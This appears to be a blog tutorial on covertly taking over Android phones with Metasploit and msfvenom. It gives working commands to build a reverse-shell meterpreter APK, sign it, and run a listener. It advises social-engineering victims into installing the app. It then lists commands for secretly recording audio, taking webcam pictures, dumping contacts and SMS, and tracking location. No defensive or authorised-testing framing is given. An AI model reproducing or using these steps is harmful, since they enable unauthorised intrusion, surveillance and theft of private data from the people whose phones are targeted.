How to exploit android phones with Metasploit and msfvenom

You have probably heard about the most famous hacking framework called Metasploit. This framework is one of the most used pentesting frameworks which by default is included in Kali Linux. All the professional hackers recommend Metasploit as their ideal tool for hacking and exploitation of android phones as well and windows devices. It also has plenty of modules for hacking IOS. The Metasploit and msfvenom are regarded as the best combination for hacking android devices

What is msfvenom?

Msfvenom is an android hacking framework used for making hacking apk files which have embedded reverse shells which can be used for hacking android devices. This tool was not present in backtrack but is now present in Kali Linux as a separate option to make android hacking as easy as possible. We will be using Metasploit and msfvenom together for this hack.

So why is Metasploit so great?

Metasploit built by rapid7 is a community-based project. It has numerous exploits and hacks made and optimized by the community. The best part is that it is free. To show how effective it is, so lets hack and android device with Metasploit and msfvenom

METASPLOIT AND MSFVENOM

When it comes to hacking Android phones, there are lots of ways for doing so. There are apps, web portals, scripts, and whatnot. We have already seen how to hack android device with spynote.

So today we are going to guide you on how to hack android phone using Metasploit and MSFVenom.

For performing this hack using Metasploit or msfvenom, you’ll need Kali Linux OS installed in your computer and Android Phone as a target. And obviously, internet connection is a must.

Below are the steps to perform this hack using Metasploit or msfvenom. So let’s start hacking.

Step 1: Creating a malicious apk file

Open your KALI LINUX. Open your Terminal and type in the following command

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk

Output:

**LHOST= YOUR IP address

**LPORT= 4444

**Use ifconfig to find your IP address if you don`t know.

# ifconfig

Step 2: Delivering APK file to the victim

You have now created your malicious spyware .apk file using Metasploit and msfvenom. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do this so that the victim does install the apk.

**If you get any signing errors or issues use the following:

Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Jarsigner (Comes Pre-Installed in Kali Linux)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname

jarsigner -verify -verbose -certs hackingworld.apk

Step 3: Metasploit setup

Open up a new terminal and use the following command to start Metasploit framework.

# msfconsole

Now in the Metasploit framework console type the following

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.78.129

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > exploit

Here

**LHOST= YOUR IP address

**LPORT= 4444

Now when the user opens up the app on his/her phone, you will get a session with that device. And whoa! The device is yours to operate. Metasploit and msfvenom are not that difficult to use but need very methodology steps that need to implement.

Step 4: Exploit..!!!

The moment the victim opens the application on their device, you will get a meterpreter shell on the Kali Linux terminal.

You have now successfully hacked the android device using Metasploit and msfvenom

Some commands you should try using Metasploit and msfvenom:

– record_mic

Records the audio from the android device and stores it on the local drive.

– webcam_snap

Lets you take the images by hacking the android camera of the device

– webcam_stream

Lets you stream live video from the hacked android camera

– dump_contacts

Lets you hack and copy all the contacts from the victim’s phone.

– dump_sms

Lets you hack the victim’s messages and stored it in a text file on your system.

– geolocate

Helps you track the hacked device by location

So, this is how hackers hack using Metasploit and msfvenom on the local network.